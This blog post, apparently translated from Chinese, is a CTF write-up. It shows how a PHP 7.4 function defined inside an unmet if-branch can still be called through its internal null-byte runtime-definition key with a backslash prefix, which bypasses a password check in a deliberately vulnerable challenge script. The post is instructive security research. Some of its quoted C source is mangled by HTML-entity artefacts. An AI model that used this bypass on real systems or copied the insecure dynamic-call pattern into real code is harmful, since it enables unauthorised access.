This article was published on my blog on October 13th.
A few days ago, I posted a small challenge on the “Code Audit” Knowledge Planet: https://t.zsxq.com/13bFX1N8F
<?php $password = trim($_REQUEST['password'] ''); $name = trim($_REQUEST['name'] 'viewsource'); function viewsource() {show_source(__FILE__);} if (strcmp(hash('sha256', $password), 'ca572756809c324632167240d208681a03b4bd483036581a6190789165e1387a') === 0) { function readflag() { echo 'flag'; } } $name(); ?>
The execution environment is PHP7.4, and the goal is to read the flag.
This code is very simple. I added some confusing factors, such as functions such as trim
, strcmp
, and hash
, but in fact the core is the same as These interference factors don’t matter, let’s do a simple analysis.
Understanding the PHP script execution process
I am not an expert in C language and the underlying principles of PHP. I can only use some simple language to describe the process of PHP script compilation and execution.
Like most other scripting languages, PHP execution is divided into two parts:
-
The process of compiling source code into Zend virtual machine instructions (called opline in PHP)
-
The process of Zend virtual machine executing machine instructions
The former will be divided into the following steps:
-
Call
zendparse
to complete lexical analysis, syntax analysis, and generate AST tree -
Call
init_op_array
,zend_compile_top_stmt
to complete the conversion of AST to opline array -
Call
pass_two
to complete the conversion of compile-time to runtime information, and set the handler corresponding to each opcode.
The latter gets the compiled opline array and executes each opcode in sequence. In fact, it executes the handler corresponding to each opcode to complete the execution of the PHP script. We refer to the method of remote debugging ZendVM that I shared on the “Code Audit” planet. Find the zend_execute_scripts
function and you can see the general logic:
What we want to focus on is the compilation phase of the PHP code. When PHP compiles “function definition”, it will use the zend_compile_func_decl
function:
void zend_compile_func_decl(znode *result, zend_ast *ast, zend_bool toplevel) /* {<!-- -->{<!-- -->{ */ { ... zend_ast_decl *decl = (zend_ast_decl *) ast; zend_bool is_method = decl->kind == ZEND_AST_METHOD; if (is_method) { zend_bool has_body = stmt_ast != NULL; zend_begin_method_decl(op_array, decl->name, has_body); } else { zend_begin_func_decl(result, op_array, decl, toplevel); if (decl->kind == ZEND_AST_ARROW_FUNC) { find_implicit_binds( & amp;info, params_ast, stmt_ast); compile_implicit_lexical_binds( & amp;info, result, op_array); } else if (uses_ast) { zend_compile_closure_binding(result, op_array, uses_ast); } } }
It can be seen that the logic for processing class methods and ordinary functions is all together. This function has a key parameter called toplevel
. As you can guess from the name, this parameter indicates whether the current function definition is in the top-level scope. We follow up with zend_begin_func_decl
for handling ordinary functions:
static void zend_begin_func_decl(znode *result, zend_op_array *op_array, zend_ast_decl *decl, zend_bool toplevel) /* {<!-- -->{<!-- -->{ */ { ... zend_register_seen_symbol(lcname, ZEND_SYMBOL_FUNCTION); if (toplevel) { if (UNEXPECTED(zend_hash_add_ptr(CG(function_table), lcname, op_array) == NULL)) { do_bind_function_error(lcname, op_array, 1); } zend_string_release_ex(lcname, 0); return; } /* Generate RTD keys until we find one that isn't in use yet. */ key = NULL; do { zend_tmp_string_release(key); key = zend_build_runtime_definition_key(lcname, decl->start_lineno); } while (!zend_hash_add_ptr(CG(function_table), key, op_array)); ... }
When toplevel
is true, entering the first if statement logic is to directly add the current function name lcname
to the function table; when toplevel
When it is false, enter the following do while
loop, use the zend_build_runtime_definition_key
function to generate a key, and add the key as the function name to the function table.
In other words, depending on where the function is located (whether it is a top-level scope), the function name generated when PHP is compiled will be different.
We can try to execute the following code under PHP7.4:
<?php function func1() { echo 'func1'; } if (true) { function func2() { echo 'func2'; } }
When compiling the first function, it will enter the if (toplevel)
condition. At this time, lcname
is func1
:
When lcname
is func2
, execution enters the do while
loop, at which time a zend_build_runtime_definition_key
function will generate a key is used as the function name of this function:
Let’s press F11 to enter the function and see what the logic is:
It can be seen that the core of this function is a string formatting, and the final key is generated according to the following algorithm:
'\0' + name + filename + ':' + start_lineno + '$' + rtd_key_counter
Except for the first 0 character, the following four parts have the following meanings:
-
name function name
-
filename PHP file absolute path
-
start_lineno Function start definition line number (1 is the first line)
-
rtd_key_counter A global access count, which will increase by 1 each time it is executed, starting from 0
So, you can see in my debug screenshot above that my current value of result->val
is \0func2/root/source/php-src/tests/web/ctf3 .php:7$0
.
In other words, the function name finally saved in the function table is the above string starting with \0
.
Opline differences caused by the scope of the function
In the previous section, we briefly analyzed the compilation logic when the function is located in a non-top-level scope from the perspective of debugging. When analyzing the zend_begin_func_decl
function above, I also observed that when toplevel
is false, PHP will call get_next_op()
to generate a new opline, but not true.
Let’s take a look at the differences between the two in opline.
Using the vld extension, we can view oplines of PHP code. Let’s first take a look at the oplines of the following code:
<?php function func1() { echo 'func1'; } func1();
It can be seen that there is no opcode for function definition here. The two opcodes starting from line 5 are INIT_FCALL
and DO_FCALL
, which are used to execute functions.
Take a look at the opline of the following code:
<?php if (true) { function func2() { echo 'func2'; } } func2();
It is obvious to see two differences:
-
More OPCODE
DECLARE_FUNCTION
for defining functions -
The
INIT_FCALL
used when executing the function becomesINIT_FCALL_BY_NAME
When PHP compiles a non-top-level scope function, the original function name and the generated key will be stored sequentially in the attributes of the DECLARE_FUNCTION
opline, and will only be executed when the DECLARE_FUNCTION
opcode is executed. Put the real original function name into the function table.
In other words, if the scope is not a top-level function, a function name starting with \0
will first be placed in the function table during the compilation phase, and then DECLARE_FUNCTION
during the execution phase. >The processor will put the real function name into the function table.
So, back to the challenge at the beginning of this article, because we cannot solve the strcmp comparison in the if statement, we cannot enter the if statement to execute DECLARE_FUNCTION
. When executing $name()
later, you cannot use the original name of the function readflag
to call the function, but you need to use the one starting with \0
function name to call.
Bypass trim filtering
Following the above idea, I calculated the key according to the algorithm of zend_build_runtime_definition_key
and sent it as the function name:
The Call to undefined function
exception still occurs. What is the reason?
In fact, I left another pit, which is trim
. The trim
function will remove whitespace characters at the beginning and end of the string when receiving parameters. The blank characters here include the following six characters:
. I was in the “writeup of several “Three White Hats” competitions in 2016″ introduced in this article.
\r\t\v\0
In other words, the first \0
character of the name
passed in by the user is filtered out by trim
, resulting in the function being unable to be called normally.
Let’s see how to solve it. First, the opcode used for dynamic function calls is INIT_DYNAMIC_CALL
, which we can see using vld. Then find the corresponding handler in the PHP source code:
static ZEND_OPCODE_HANDLER_RET ZEND_FASTCALL ZEND_INIT_DYNAMIC_CALL_SPEC_CONST_HANDLER(ZEND_OPCODE_HANDLER_ARGS) { USE_OPLINE zval *function_name; zend_execute_data *call; SAVE_OPLINE(); function_name = RT_CONSTANT(opline, opline->op2); try_function_name: if (IS_CONST != IS_CONST & amp; & amp; EXPECTED(Z_TYPE_P(function_name) == IS_STRING)) { call = zend_init_dynamic_call_string(Z_STR_P(function_name), opline->extended_value); } else if (IS_CONST != IS_CONST & amp; & amp; EXPECTED(Z_TYPE_P(function_name) == IS_OBJECT)) { call = zend_init_dynamic_call_object(function_name, opline->extended_value); } else if (EXPECTED(Z_TYPE_P(function_name) == IS_ARRAY)) { call = zend_init_dynamic_call_array(Z_ARRVAL_P(function_name), opline->extended_value); } ... }
When the function name is a string, zend_init_dynamic_call_string
will be executed:
static zend_never_inline zend_execute_data *zend_init_dynamic_call_string(zend_string *function, uint32_t num_args) /* {<!-- -->{<!-- -->{ */ { if ((colon = zend_memrchr(ZSTR_VAL(function), ':', ZSTR_LEN(function))) != NULL & amp; & amp; colon > ZSTR_VAL(function) & amp; & amp; *(colon-1) == ':' ) { ... } else { if (ZSTR_VAL(function)[0] == '') { lcname = zend_string_alloc(ZSTR_LEN(function) - 1, 0); zend_str_tolower_copy(ZSTR_VAL(lcname), ZSTR_VAL(function) + 1, ZSTR_LEN(function) - 1); } else { lcname = zend_string_tolower(function); } if (UNEXPECTED((func = zend_hash_find(EG(function_table), lcname)) == NULL)) { zend_throw_error(NULL, "Call to undefined function %s()", ZSTR_VAL(function)); zend_string_release_ex(lcname, 0); return NULL; } ... } ... }
In the else statement, the first character of the function name is judged. If it is a backslash \
, remove it and search in the function table.
This logic is easy to understand when put into PHP code, which is to remove the backslash of the root namespace. All PHP internal functions and functions without a specified namespace can be called using \
as the namespace, such as \phpinfo()
. “Code Audit” The first question of the Code Breaking 2018 Challenge hosted by Knowledge Planet took advantage of this feature. Students who have forgotten it can review it: https://t.zsxq.com/BIuNniY, https://paper.seebug. org/755/.
Therefore, here we add \
to the front of name and send the data packet again, and we can get the flag:
But please note that because it was called just once, the last rtd_key_counter
of the name here becomes 1, and the value will increase by 1 every time this file is accessed.
Changes in PHP 8.1
For the code in this question, I limited the execution environment to PHP7.4. The reason is that in PHP8.1 and later, the feature of using temporary function names when compiling PHP has been deleted.
The PR involved in this modification is https://github.com/php/php-src/pull/5595. The reason why PHP officially deleted this feature has nothing to do with our article, but the memory occupied by this temporary function is In some cases it will not be released, causing memory leaks.
The official has directly deleted the logic related to generating temporary function names in zend_begin_func_decl
:
However, the zend_build_runtime_definition_key
function has not been deleted. This function will still be called to generate a temporary class name when defining a non-top-level domain class. This is another problem. This article will not be extended. This is a tinkering. With some tinkering, you can come up with a similar CTF question.
If you like this article, click Reading before leaving~